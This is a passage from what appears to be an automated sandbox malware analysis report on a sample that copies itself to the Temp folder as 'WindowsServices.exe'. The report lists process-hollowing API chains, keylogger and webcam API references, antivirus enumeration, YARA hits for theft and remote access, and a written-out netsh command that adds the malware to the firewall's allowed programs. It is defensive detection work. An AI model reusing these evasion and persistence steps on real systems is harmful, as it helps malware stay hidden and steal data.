        Source: netsh.exe, 0000000C.00000003.1542415092.0000000003271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: iR2UtZj5vP.exe, 00000004.00000002.1424770277.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeAPI call chain: ExitProcess graph end nodegraph_1-2472
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeAPI call chain: ExitProcess graph end nodegraph_1-2558
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_5-2471
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_5-2557
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_14-2472
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_14-2555
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_14-2554
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_18-2472
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_18-2555
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_18-2554
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_22-2472
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_22-2555
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_22-2554
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 mov eax, dword ptr fs:[00000030h]1_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_00405A10 mov eax, dword ptr fs:[00000030h]5_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_00405A10 mov eax, dword ptr fs:[00000030h]14_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_00405A10 mov eax, dword ptr fs:[00000030h]18_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_00405A10 mov eax, dword ptr fs:[00000030h]22_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, kl.csReference to suspicious API methods: MapVirtualKey(a, 0u)
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, kl.csReference to suspicious API methods: GetAsyncKeyState(num2)
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, OK.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory written: C:\Users\user\Desktop\iR2UtZj5vP.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exeJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 7976, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 8100, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7180, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7396, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 340, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2928, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2292, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2960, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2536, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 4520, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE
